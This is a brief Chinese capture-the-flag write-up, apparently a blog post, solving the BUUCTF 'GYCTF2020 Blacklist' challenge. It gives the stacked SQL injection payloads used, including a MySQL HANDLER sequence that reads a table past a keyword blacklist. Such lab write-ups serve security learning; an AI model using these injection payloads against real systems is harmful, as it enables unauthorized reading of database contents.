BUUCTF[GYCTF2020]Blacklist 1

进入靶场,

 

 1,使用   1’  ,发现注入点(''1''')

 2,使用联合注入,发现屏蔽了关键字。

 3,尝试堆叠注入,

   ?inject=1';show tables ;#

   ?inject=1';show columns from `FlagHere`#

这里屏蔽的东西太多了,尝试使用handler.

4,构造payload : ?inject=1'; handler FlagHere open; handler FlagHere read first ;handler FlagHere close;#

 得到flag。

 

handler学习https://blog.csdn.net/jesseyoung/article/details/40785137

posted @ 2021-10-11 20:55  LoYoHo00  阅读(65)  评论(0编辑  收藏  举报
levels of contents